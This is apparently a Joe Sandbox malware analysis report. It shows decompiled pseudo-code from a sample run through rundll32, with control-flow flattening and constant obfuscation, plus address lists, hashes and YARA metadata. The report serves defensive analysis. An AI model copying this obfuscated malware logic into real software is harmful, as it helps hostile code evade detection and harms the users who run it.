				 *(_t426 + 0x34) =  *(_t426 + 0x34) + 0xdf07;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) << 3;
				 *(_t426 + 0x34) =  *(_t426 + 0x34) ^ 0xaac3765a;
				 *(_t426 + 0x68) = 0xbbaf5f;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) >> 3;
				_t372 =  *(_t426 + 0x6c);
				_t411 =  *(_t426 + 0x6c);
				_t424 =  *(_t426 + 0x6c);
				_t420 =  *(_t426 + 0x6c);
				 *(_t426 + 0x68) =  *(_t426 + 0x68) * 0x7d;
				 *(_t426 + 0x68) =  *(_t426 + 0x68) ^ 0x0b7165e1;
				 *(_t426 + 0x74) = 0xfd4b1c;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) + 0x7fb7;
				 *(_t426 + 0x74) =  *(_t426 + 0x74) ^ 0x00f7158e;
				 *(_t426 + 0x88) = 0xbb9d8e;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) * 0x48;
				 *(_t426 + 0x88) =  *(_t426 + 0x88) ^ 0x34cbdce1;
				 *(_t426 + 0x3c) = 0x9303e6;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) << 0xf;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xad47a309;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) * 0x3d;
				 *(_t426 + 0x3c) =  *(_t426 + 0x3c) ^ 0xa7019983;
				 *(_t426 + 0x80) = 0xaf4918;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) + 0x655a;
				 *(_t426 + 0x80) =  *(_t426 + 0x80) ^ 0x00a67f7b;
				 *(_t426 + 0x78) = 0xd8d1b1;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) * 0x42;
				 *(_t426 + 0x78) =  *(_t426 + 0x78) ^ 0x37ebe9ce;
				while(1) {
					L1:
					_t347 = 0xfb52c5;
					L2:
					while(_t374 != 0xd963e9) {
						if(_t374 == _t347) {
							_t350 = E0069C264( *((intOrPtr*)(_t426 + 0xbc)), _t372,  *(_t426 + 0x3c), _t426 + 0xac,  *((intOrPtr*)(_t426 + 0xa4)), _t374, _t374, _t420,  *(_t426 + 0x68), _t374,  *(_t426 + 0x48),  *(_t426 + 0xa0), _t411);
							_t426 = _t426 + 0x2c;
							__eflags = _t350;
							if(_t350 == 0) {
								_t351 =  *(_t426 + 0xa0);
							} else {
								_t422 = _t411;
								while(1) {
									__eflags = _t422[1] - 4;
									if(_t422[1] != 4) {
										goto L20;
									}
									L19:
									_t355 = E0068B23C( *(_t426 + 0x38),  *(_t426 + 0x30), _t424,  *(_t426 + 0x94),  *(_t426 + 0x20),  &(_t422[3]));
									_t426 = _t426 + 0x10;
									__eflags = _t355;
									if(_t355 == 0) {
										_t351 = 1;
										 *(_t426 + 0xa0) = 1;
									} else {
										goto L20;
									}
									L25:
									_t420 =  *(_t426 + 0x6c);
									goto L26;
									L20:
									_t353 =  *_t422;
									__eflags = _t353;
									if(_t353 == 0) {
										_t351 =  *(_t426 + 0xa0);
									} else {
										_t422 = _t422 + _t353;
										__eflags = _t422[1] - 4;
										if(_t422[1] != 4) {
											goto L20;
										}
									}
									goto L25;
								}
							}
							L26:
							__eflags = _t351;
							if(__eflags == 0) {
								_t347 = 0xfb52c5;
								_t374 = 0xfb52c5;
								continue;
							} else {
								_t407 =  *0x6a3e0c; // 0x0
								E0069458F( *(_t426 + 0x64),  *((intOrPtr*)(_t407 + 8)),  *(_t426 + 0x34));
								_t374 = 0xd963e9;
								goto L1;
							}
							L32:
						} else {
							if(_t374 == 0x247652d) {
								_t360 = E00688F65( *(_t426 + 0x68),  *(_t426 + 0x34), _t426 + 0xb4,  *(_t426 + 0x9c), 0x2000000, _t374, 1,  *(_t426 + 0x80),  *((intOrPtr*)(_t426 + 0xa4)),  *(_t426 + 0x6c), _t374,  *(_t426 + 0x30) | 0x00000006);
								_t372 = _t360;
								_t426 = _t426 + 0x28;
								__eflags = _t360 - 0xffffffff;
								if(__eflags != 0) {
									_t374 = 0x7db0050;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								}
							} else {
								if(_t374 == 0x4334ccc) {
									E0069DA22( *(_t426 + 0x28),  *(_t426 + 0x64), __eflags,  *(_t426 + 0x68), _t426 + 0xac, _t374,  *(_t426 + 0x48));
									_t364 = E0068B6CF(_t426 + 0xbc,  *((intOrPtr*)(_t426 + 0xac)),  *(_t426 + 0x34),  *(_t426 + 0x48));
									_t424 = _t364;
									_t426 = _t426 + 0x18;
									_t374 = 0x247652d;
									 *((short*)(_t364 - 2)) = 0;
									while(1) {
										L1:
										_t347 = 0xfb52c5;
										goto L2;
									}
								} else {
									if(_t374 == 0x7db0050) {
										_t420 = 0x1000;
										_push(_t374);
										_push(_t374);
										 *(_t426 + 0x74) = 0x1000;
										_t411 = E00687FF2(0x1000);
										_t347 = 0xfb52c5;
										__eflags = _t411;
										_t374 =  !=  ? 0xfb52c5 : 0xf828486;
										continue;
									} else {
										if(_t374 == 0xebf23c2) {
											_t374 = 0x4334ccc;
											continue;
										} else {
											if(_t374 != 0xf828486) {
												L30:
												__eflags = _t374 - 0x24bb42a;
												if(__eflags != 0) {
													continue;
												} else {
												}
											} else {
												E00691E67( *(_t426 + 0x94),  *(_t426 + 0x48),  *(_t426 + 0x88),  *(_t426 + 0x7c), _t372);
											}
										}
									}
								}
							}
						}
						return 0;
						goto L32;
					}
					E00698519( *(_t426 + 0x68),  *(_t426 + 0x74), _t411);
					_t374 = 0xf828486;
					_t347 = 0xfb52c5;
					goto L30;
				}
			}






















                                                                                                                      0x006881bd
                                                                                                                      0x006881c7
                                                                                                                      0x006881cf
                                                                                                                      0x006881d4
                                                                                                                      0x006881dc
                                                                                                                      0x006881e4
                                                                                                                      0x006881f3
                                                                                                                      0x006881f8
                                                                                                                      0x006881fe
                                                                                                                      0x00688206
                                                                                                                      0x0068820e
                                                                                                                      0x00688219
                                                                                                                      0x00688224
                                                                                                                      0x0068822f
                                                                                                                      0x00688237
                                                                                                                      0x0068823c
                                                                                                                      0x00688241
                                                                                                                      0x00688246
                                                                                                                      0x0068824e
                                                                                                                      0x0068825b
                                                                                                                      0x0068825c
                                                                                                                      0x00688264
                                                                                                                      0x00688268
                                                                                                                      0x00688270
                                                                                                                      0x00688278
                                                                                                                      0x00688280
                                                                                                                      0x0068828e
                                                                                                                      0x00688292
                                                                                                                      0x0068829a
                                                                                                                      0x006882a2
                                                                                                                      0x006882aa
                                                                                                                      0x006882af
                                                                                                                      0x006882b7
                                                                                                                      0x006882c2
                                                                                                                      0x006882ca
                                                                                                                      0x006882d5
                                                                                                                      0x006882dd
                                                                                                                      0x006882e2
                                                                                                                      0x006882ea
                                                                                                                      0x006882f2
                                                                                                                      0x006882fa
                                                                                                                      0x00688307
                                                                                                                      0x0068830b
                                                                                                                      0x00688313
                                                                                                                      0x0068831b
                                                                                                                      0x00688323
                                                                                                                      0x0068832b
                                                                                                                      0x00688333
                                                                                                                      0x00688338
                                                                                                                      0x00688340
                                                                                                                      0x00688348
                                                                                                                      0x00688355
                                                                                                                      0x00688359
                                                                                                                      0x00688361
                                                                                                                      0x00688369
                                                                                                                      0x00688371
                                                                                                                      0x00688376
                                                                                                                      0x0068837e
                                                                                                                      0x00688386
                                                                                                                      0x0068838b
                                                                                                                      0x00688393
                                                                                                                      0x0068839b
                                                                                                                      0x006883a8
                                                                                                                      0x006883ac
                                                                                                                      0x006883b4
                                                                                                                      0x006883bc
                                                                                                                      0x006883c6
                                                                                                                      0x006883ce
                                                                                                                      0x006883d6
                                                                                                                      0x006883de
                                                                                                                      0x006883e6
                                                                                                                      0x006883eb
                                                                                                                      0x006883f3
                                                                                                                      0x006883fb
                                                                                                                      0x00688403
                                                                                                                      0x00688412
                                                                                                                      0x00688415
                                                                                                                      0x00688419
                                                                                                                      0x00688421
                                                                                                                      0x0068842c
                                                                                                                      0x00688437
                                                                                                                      0x00688442
                                                                                                                      0x0068844a
                                                                                                                      0x0068844f
                                                                                                                      0x00688457
                                                                                                                      0x0068845f
                                                                                                                      0x00688467
                                                                                                                      0x0068846f
                                                                                                                      0x0068847f
                                                                                                                      0x00688483
                                                                                                                      0x0068848b
                                                                                                                      0x00688493
                                                                                                                      0x0068849b
                                                                                                                      0x006884a0
                                                                                                                      0x006884a8
                                                                                                                      0x006884bb
                                                                                                                      0x006884be
                                                                                                                      0x006884c5
                                                                                                                      0x006884d0
                                                                                                                      0x006884e0
                                                                                                                      0x006884e4
                                                                                                                      0x006884ec
                                                                                                                      0x006884f4
                                                                                                                      0x006884fc
                                                                                                                      0x00688504
                                                                                                                      0x00688510
                                                                                                                      0x00688515
                                                                                                                      0x0068851b
                                                                                                                      0x00688520
                                                                                                                      0x00688528
                                                                                                                      0x00688533
                                                                                                                      0x0068853e
                                                                                                                      0x00688549
                                                                                                                      0x00688555
                                                                                                                      0x00688558
                                                                                                                      0x0068855c
                                                                                                                      0x00688561
                                                                                                                      0x00688566
                                                                                                                      0x0068856e
                                                                                                                      0x00688576
                                                                                                                      0x00688580
                                                                                                                      0x00688584
                                                                                                                      0x0068858c
                                                                                                                      0x00688594
                                                                                                                      0x00688599
                                                                                                                      0x006885a1
                                                                                                                      0x006885a6
                                                                                                                      0x006885ae
                                                                                                                      0x006885b6
                                                                                                                      0x006885c0
                                                                                                                      0x006885c4
                                                                                                                      0x006885c8
                                                                                                                      0x006885cc
                                                                                                                      0x006885d0
                                                                                                                      0x006885d4
                                                                                                                      0x006885dc
                                                                                                                      0x006885e4
                                                                                                                      0x006885ec
                                                                                                                      0x006885f4
                                                                                                                      0x00688607
                                                                                                                      0x0068860e
                                                                                                                      0x00688619
                                                                                                                      0x00688621
                                                                                                                      0x00688626
                                                                                                                      0x00688633
                                                                                                                      0x00688637
                                                                                                                      0x0068863f
                                                                                                                      0x0068864a
                                                                                                                      0x00688655
                                                                                                                      0x00688660
                                                                                                                      0x0068866d
                                                                                                                      0x00688671
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x00000000
                                                                                                                      0x0068867e
                                                                                                                      0x0068868c
                                                                                                                      0x00688806
                                                                                                                      0x0068880b
                                                                                                                      0x0068880e
                                                                                                                      0x00688810
                                                                                                                      0x00688854
                                                                                                                      0x00688812
                                                                                                                      0x00688812
                                                                                                                      0x00688814
                                                                                                                      0x00688814
                                                                                                                      0x00688818
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0068881a
                                                                                                                      0x00688832
                                                                                                                      0x00688837
                                                                                                                      0x0068883a
                                                                                                                      0x0068883c
                                                                                                                      0x0068884a
                                                                                                                      0x0068884b
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00688864
                                                                                                                      0x00688864
                                                                                                                      0x00000000
                                                                                                                      0x0068883e
                                                                                                                      0x0068883e
                                                                                                                      0x00688840
                                                                                                                      0x00688842
                                                                                                                      0x0068885d
                                                                                                                      0x00688844
                                                                                                                      0x00688844
                                                                                                                      0x00688814
                                                                                                                      0x00688818
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00688818
                                                                                                                      0x00000000
                                                                                                                      0x00688842
                                                                                                                      0x00688814
                                                                                                                      0x00688868
                                                                                                                      0x00688868
                                                                                                                      0x0068886a
                                                                                                                      0x0068888d
                                                                                                                      0x00688892
                                                                                                                      0x00000000
                                                                                                                      0x0068886c
                                                                                                                      0x00688870
                                                                                                                      0x0068887d
                                                                                                                      0x00688883
                                                                                                                      0x00000000
                                                                                                                      0x00688883
                                                                                                                      0x00000000
                                                                                                                      0x00688692
                                                                                                                      0x00688698
                                                                                                                      0x006887b9
                                                                                                                      0x006887be
                                                                                                                      0x006887c0
                                                                                                                      0x006887c3
                                                                                                                      0x006887c6
                                                                                                                      0x006887cc
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x00000000
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x0068869e
                                                                                                                      0x006886a4
                                                                                                                      0x0068874a
                                                                                                                      0x00688765
                                                                                                                      0x0068876a
                                                                                                                      0x0068876c
                                                                                                                      0x00688771
                                                                                                                      0x00688776
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x00688679
                                                                                                                      0x00000000
                                                                                                                      0x00688679
                                                                                                                      0x006886aa
                                                                                                                      0x006886b0
                                                                                                                      0x006886ff
                                                                                                                      0x0068870e
                                                                                                                      0x0068870f
                                                                                                                      0x00688710
                                                                                                                      0x0068871a
                                                                                                                      0x0068871c
                                                                                                                      0x00688722
                                                                                                                      0x00688729
                                                                                                                      0x00000000
                                                                                                                      0x006886b2
                                                                                                                      0x006886b8
                                                                                                                      0x006886f4
                                                                                                                      0x00000000
                                                                                                                      0x006886ba
                                                                                                                      0x006886c0
                                                                                                                      0x006888b2
                                                                                                                      0x006888b2
                                                                                                                      0x006888b8
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x006888be
                                                                                                                      0x006886c6
                                                                                                                      0x006886dd
                                                                                                                      0x006886e2
                                                                                                                      0x006886c0
                                                                                                                      0x006886b8
                                                                                                                      0x006886b0
                                                                                                                      0x006886a4
                                                                                                                      0x00688698
                                                                                                                      0x006886f1
                                                                                                                      0x00000000
                                                                                                                      0x006886f1
                                                                                                                      0x006888a2
                                                                                                                      0x006888a8
                                                                                                                      0x006888ad
                                                                                                                      0x00000000
                                                                                                                      0x006888ad

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Q$/&X$Lz$N'`$S,I$Ze$q_
                                                                                                                      • API String ID: 0-1837206032
                                                                                                                      • Opcode ID: 46b81b709f89228e37a7f61169cd600b2d592a7ba0c5e943ddbd8ee39e793391
                                                                                                                      • Instruction ID: 918498450265e43cfd7f9aa68f4380cade8cf0e415f823283162a96dcdd9c2d4
                                                                                                                      • Opcode Fuzzy Hash: 46b81b709f89228e37a7f61169cd600b2d592a7ba0c5e943ddbd8ee39e793391
                                                                                                                      • Instruction Fuzzy Hash: 9D0231711083809FD368DF25C489A5FBBE2FBC4758F508A1DF29A86260DBB49949CF43
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068E5CF Relevance: 9.0, Strings: 7, Instructions: 204COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 96%
                                                                                                                      			E0068E5CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				void* _t170;
				void* _t181;
				void* _t184;
				void* _t189;
				void* _t192;
				void* _t195;
				void* _t197;
				void* _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int* _t226;

				_push(_a8);
				_t219 = _a4;
				_t195 = __ecx;
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E006920B9(_t170);
				_v56 = 0xa4c651;
				_t226 =  &(( &_v116)[4]);
				_v56 = _v56 ^ 0x6a6d8bac;
				_v56 = _v56 ^ 0x6ac6bd64;
				_t220 = 0;
				_v60 = 0xbac055;
				_t197 = 0xf39239f;
				_v60 = _v60 << 0xd;
				_v60 = _v60 ^ 0x580542e6;
				_v108 = 0xd580f5;
				_v108 = _v108 ^ 0x97cdda0d;
				_v108 = _v108 + 0x37dd;
				_v108 = _v108 >> 0xe;
				_v108 = _v108 ^ 0x00021113;
				_v52 = 0xf28435;
				_v52 = _v52 | 0x057a1a90;
				_v52 = _v52 ^ 0x05fdc129;
				_v80 = 0x5c8bc8;
				_t221 = 0x27;
				_v80 = _v80 / _t221;
				_t222 = 0x1b;
				_v80 = _v80 * 9;
				_v80 = _v80 ^ 0x0013f028;
				_v96 = 0x281d9a;
				_v96 = _v96 + 0xffff8f77;
				_v96 = _v96 + 0x4719;
				_v96 = _v96 << 0xf;
				_v96 = _v96 ^ 0xfa152b1c;
				_v112 = 0x7415d8;
				_v112 = _v112 >> 0xf;
				_v112 = _v112 + 0xfffff76c;
				_v112 = _v112 >> 0xd;
				_v112 = _v112 ^ 0x000d779a;
				_v88 = 0xb68707;
				_v88 = _v88 ^ 0x45e0ecf4;
				_v88 = _v88 + 0xffff71c0;
				_v88 = _v88 ^ 0x455519c2;
				_v116 = 0xceabf6;
				_v116 = _v116 + 0x1225;
				_v116 = _v116 / _t222;
				_v116 = _v116 >> 6;
				_v116 = _v116 ^ 0x0006e3bb;
				_v84 = 0xd525a4;
				_v84 = _v84 + 0xffff1243;
				_v84 = _v84 + 0x1c30;
				_v84 = _v84 ^ 0x00df7efc;
				_v100 = 0xf29ecf;
				_v100 = _v100 << 0xc;
				_v100 = _v100 + 0xffff4e95;
				_v100 = _v100 ^ 0x70d6065d;
				_v100 = _v100 ^ 0x593d89f0;
				_v104 = 0x2206c6;
				_v104 = _v104 | 0x38687435;
				_v104 = _v104 ^ 0xadcf411b;
				_v104 = _v104 ^ 0x9549ac77;
				_v104 = _v104 ^ 0x00e3f730;
				_v92 = 0xd38a43;
				_v92 = _v92 >> 3;
				_v92 = _v92 + 0x6fd1;
				_v92 = _v92 ^ 0x0012c73c;
				_v64 = 0x625266;
				_v64 = _v64 + 0x2436;
				_v64 = _v64 ^ 0x006987c3;
				_v68 = 0xe296bd;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x52d9a139;
				_v72 = 0x54a2fd;
				_v72 = _v72 << 0xd;
				_v72 = _v72 >> 0xa;
				_v72 = _v72 ^ 0x002b3e4c;
				_v76 = 0x32cdcd;
				_v76 = _v76 << 0xb;
				_t223 = 0x32;
				_v76 = _v76 / _t223;
				_v76 = _v76 ^ 0x0302c408;
				_v48 = 0x2d2164;
				_v48 = _v48 + 0xfffff0e0;
				_v48 = _v48 ^ 0x0021ab5a;
				do {
					while(_t197 != 0x2168849) {
						if(_t197 == 0x29fa3de) {
							_t184 = E00682A21(_v84, _v100,  &_v44, _t219 + 0x20, _v104);
							_t226 =  &(_t226[3]);
							__eflags = _t184;
							if(__eflags != 0) {
								_t197 = 0x74ac459;
								continue;
							}
						} else {
							if(_t197 == 0x545de14) {
								E00683DBC( &_v44, _t195, _v56, _v60, _v108);
								_t226 =  &(_t226[3]);
								_t197 = 0x2168849;
								continue;
							} else {
								if(_t197 == 0x6ab10c5) {
									_t189 = E00682A21(_v112, _v88,  &_v44, _t219 + 0x1c, _v116);
									_t226 =  &(_t226[3]);
									__eflags = _t189;
									if(__eflags != 0) {
										_t197 = 0x29fa3de;
										continue;
									}
								} else {
									if(_t197 == 0x74ac459) {
										_t192 = E00682A21(_v92, _v64,  &_v44, _t219 + 0x28, _v68);
										_t226 =  &(_t226[3]);
										__eflags = _t192;
										if(__eflags != 0) {
											_t197 = 0x9dbfb8a;
											continue;
										}
									} else {
										if(_t197 == 0x9dbfb8a) {
											__eflags = E0069D97D( &_v44, _v72, __eflags, _v76, _t219 + 4, _v48);
											_t220 =  !=  ? 1 : _t220;
											__eflags = _t220;
										} else {
											if(_t197 != 0xf39239f) {
												goto L19;
											} else {
												_t197 = 0x545de14;
												continue;
											}
										}
									}
								}
							}
						}
						L22:
						return _t220;
					}
					_t181 = E00682A21(_v52, _v80,  &_v44, _t219 + 0x14, _v96);
					_t226 =  &(_t226[3]);
					__eflags = _t181;
					if(__eflags == 0) {
						_t197 = 0x90a774d;
						goto L19;
					} else {
						_t197 = 0x6ab10c5;
						continue;
					}
					goto L22;
					L19:
					__eflags = _t197 - 0x90a774d;
				} while (__eflags != 0);
				goto L22;
			}


































                                                                                                                      0x0068e5d6
                                                                                                                      0x0068e5dd
                                                                                                                      0x0068e5e4
                                                                                                                      0x0068e5e6
                                                                                                                      0x0068e5e7
                                                                                                                      0x0068e5e8
                                                                                                                      0x0068e5e9
                                                                                                                      0x0068e5ee
                                                                                                                      0x0068e5f6
                                                                                                                      0x0068e5f9
                                                                                                                      0x0068e603
                                                                                                                      0x0068e60b
                                                                                                                      0x0068e60d
                                                                                                                      0x0068e615
                                                                                                                      0x0068e61a
                                                                                                                      0x0068e61f
                                                                                                                      0x0068e627
                                                                                                                      0x0068e62f
                                                                                                                      0x0068e637
                                                                                                                      0x0068e63f
                                                                                                                      0x0068e644
                                                                                                                      0x0068e64c
                                                                                                                      0x0068e654
                                                                                                                      0x0068e65c
                                                                                                                      0x0068e664
                                                                                                                      0x0068e672
                                                                                                                      0x0068e677
                                                                                                                      0x0068e682
                                                                                                                      0x0068e683
                                                                                                                      0x0068e687
                                                                                                                      0x0068e68f
                                                                                                                      0x0068e697
                                                                                                                      0x0068e69f
                                                                                                                      0x0068e6a7
                                                                                                                      0x0068e6ac
                                                                                                                      0x0068e6b4
                                                                                                                      0x0068e6bc
                                                                                                                      0x0068e6c1
                                                                                                                      0x0068e6c9
                                                                                                                      0x0068e6ce
                                                                                                                      0x0068e6d6
                                                                                                                      0x0068e6de
                                                                                                                      0x0068e6e6
                                                                                                                      0x0068e6ee
                                                                                                                      0x0068e6f6
                                                                                                                      0x0068e6fe
                                                                                                                      0x0068e70c
                                                                                                                      0x0068e710
                                                                                                                      0x0068e715
                                                                                                                      0x0068e71d
                                                                                                                      0x0068e725
                                                                                                                      0x0068e72d
                                                                                                                      0x0068e735
                                                                                                                      0x0068e73d
                                                                                                                      0x0068e745
                                                                                                                      0x0068e74a
                                                                                                                      0x0068e752
                                                                                                                      0x0068e75a
                                                                                                                      0x0068e762
                                                                                                                      0x0068e76a
                                                                                                                      0x0068e772
                                                                                                                      0x0068e77a
                                                                                                                      0x0068e782
                                                                                                                      0x0068e78a
                                                                                                                      0x0068e792
                                                                                                                      0x0068e797
                                                                                                                      0x0068e79f
                                                                                                                      0x0068e7a7
                                                                                                                      0x0068e7af
                                                                                                                      0x0068e7b9
                                                                                                                      0x0068e7c1
                                                                                                                      0x0068e7c9
                                                                                                                      0x0068e7ce
                                                                                                                      0x0068e7d6
                                                                                                                      0x0068e7de
                                                                                                                      0x0068e7e3
                                                                                                                      0x0068e7e8
                                                                                                                      0x0068e7f0
                                                                                                                      0x0068e7f8
                                                                                                                      0x0068e803
                                                                                                                      0x0068e80b
                                                                                                                      0x0068e80f
                                                                                                                      0x0068e817
                                                                                                                      0x0068e81f
                                                                                                                      0x0068e827
                                                                                                                      0x0068e82f
                                                                                                                      0x0068e82f
                                                                                                                      0x0068e83d
                                                                                                                      0x0068e90f
                                                                                                                      0x0068e914
                                                                                                                      0x0068e917
                                                                                                                      0x0068e919
                                                                                                                      0x0068e91b
                                                                                                                      0x00000000
                                                                                                                      0x0068e91b
                                                                                                                      0x0068e843
                                                                                                                      0x0068e849
                                                                                                                      0x0068e8e8
                                                                                                                      0x0068e8ed
                                                                                                                      0x0068e8f0
                                                                                                                      0x00000000
                                                                                                                      0x0068e84f
                                                                                                                      0x0068e855
                                                                                                                      0x0068e8bf
                                                                                                                      0x0068e8c4
                                                                                                                      0x0068e8c7
                                                                                                                      0x0068e8c9
                                                                                                                      0x0068e8cf
                                                                                                                      0x00000000
                                                                                                                      0x0068e8cf
                                                                                                                      0x0068e857
                                                                                                                      0x0068e85d
                                                                                                                      0x0068e893
                                                                                                                      0x0068e898
                                                                                                                      0x0068e89b
                                                                                                                      0x0068e89d
                                                                                                                      0x0068e8a3
                                                                                                                      0x00000000
                                                                                                                      0x0068e8a3
                                                                                                                      0x0068e85f
                                                                                                                      0x0068e865
                                                                                                                      0x0068e982
                                                                                                                      0x0068e984
                                                                                                                      0x0068e984
                                                                                                                      0x0068e86b
                                                                                                                      0x0068e871
                                                                                                                      0x00000000
                                                                                                                      0x0068e877
                                                                                                                      0x0068e877
                                                                                                                      0x00000000
                                                                                                                      0x0068e877
                                                                                                                      0x0068e871
                                                                                                                      0x0068e865
                                                                                                                      0x0068e85d
                                                                                                                      0x0068e855
                                                                                                                      0x0068e849
                                                                                                                      0x0068e988
                                                                                                                      0x0068e990
                                                                                                                      0x0068e990
                                                                                                                      0x0068e93a
                                                                                                                      0x0068e93f
                                                                                                                      0x0068e942
                                                                                                                      0x0068e944
                                                                                                                      0x0068e950
                                                                                                                      0x00000000
                                                                                                                      0x0068e946
                                                                                                                      0x0068e946
                                                                                                                      0x00000000
                                                                                                                      0x0068e946
                                                                                                                      0x00000000
                                                                                                                      0x0068e955
                                                                                                                      0x0068e955
                                                                                                                      0x0068e955
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5th8$6$$L>+$Mw$Mw$d!-$fRb
                                                                                                                      • API String ID: 0-2045295228
                                                                                                                      • Opcode ID: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                      • Instruction ID: ac2ef67a2cd5a9d81b2b4e2faf1e057494803a062321373957c33152ff6f58ea
                                                                                                                      • Opcode Fuzzy Hash: 6f2f31d65536ce47fea8f5922934b6de45e61ae0ad55fa75fcdf554af6f56bec
                                                                                                                      • Instruction Fuzzy Hash: 739164B2508341ABC798DE61C88945FFBE6FBD8758F004A1DF58292220D7B1DA19CF87
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0068E2CC Relevance: 8.9, Strings: 7, Instructions: 178COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 92%
                                                                                                                      			E0068E2CC(void* __edx, intOrPtr _a8, intOrPtr _a12) {
				char _v556;
				intOrPtr _v576;
				char _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				void* __ecx;
				void* _t136;
				void* _t151;
				signed int _t153;
				signed int _t156;
				void* _t162;
				signed int _t167;
				intOrPtr _t187;
				signed int _t188;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int* _t196;

				_push(_a12);
				_t187 = _a8;
				_push(_t187);
				_push(E00688E4D);
				_push(__edx);
				E006920B9(_t136);
				_v608 = 0x1ac257;
				_t196 =  &(( &_v652)[5]);
				_v608 = _v608 ^ 0x78a3296c;
				_v608 = _v608 ^ 0x78b9eb39;
				_t162 = 0xac58df2;
				_v624 = 0x387e66;
				_t9 =  &_v624; // 0x387e66
				_t188 = 0x2e;
				_v624 =  *_t9 * 0x13;
				_v624 = _v624 / _t188;
				_v624 = _v624 ^ 0x001972d5;
				_v644 = 0x433552;
				_v644 = _v644 + 0xffffa6b6;
				_v644 = _v644 ^ 0x94defa20;
				_v644 = _v644 << 1;
				_v644 = _v644 ^ 0x293db944;
				_v652 = 0xb70b59;
				_v652 = _v652 << 0xb;
				_v652 = _v652 + 0xffff8138;
				_t189 = 0x15;
				_v652 = _v652 / _t189;
				_v652 = _v652 ^ 0x08c5a62f;
				_v616 = 0xf4782f;
				_v616 = _v616 >> 0xa;
				_v616 = _v616 + 0xffff066a;
				_v616 = _v616 ^ 0xfff8c7bc;
				_v604 = 0x656560;
				_v604 = _v604 >> 3;
				_v604 = _v604 ^ 0x0000606f;
				_v648 = 0x377d9b;
				_t190 = 0x7f;
				_v648 = _v648 / _t190;
				_v648 = _v648 + 0xfd7f;
				_v648 = _v648 + 0xffff6b0a;
				_v648 = _v648 ^ 0x00006649;
				_v636 = 0x80cedd;
				_t191 = 0x58;
				_v636 = _v636 / _t191;
				_v636 = _v636 + 0x515e;
				_v636 = _v636 ^ 0x000b92de;
				_v620 = 0x65d9bd;
				_v620 = _v620 + 0xffff4b50;
				_v620 = _v620 ^ 0xd34cfccc;
				_v620 = _v620 ^ 0xd32e4bd2;
				_v632 = 0xb89e86;
				_v632 = _v632 + 0xffffcc79;
				_t192 = 0x2f;
				_v632 = _v632 / _t192;
				_v632 = _v632 ^ 0x00046a67;
				_v628 = 0xbb1c4a;
				_v628 = _v628 >> 6;
				_v628 = _v628 >> 9;
				_v628 = _v628 ^ 0x000a4ee8;
				_v640 = 0xfd7114;
				_v640 = _v640 << 5;
				_v640 = _v640 * 0x45;
				_v640 = _v640 + 0xa2ea;
				_v640 = _v640 ^ 0x89e0c310;
				_v612 = 0x26e293;
				_v612 = _v612 >> 0xd;
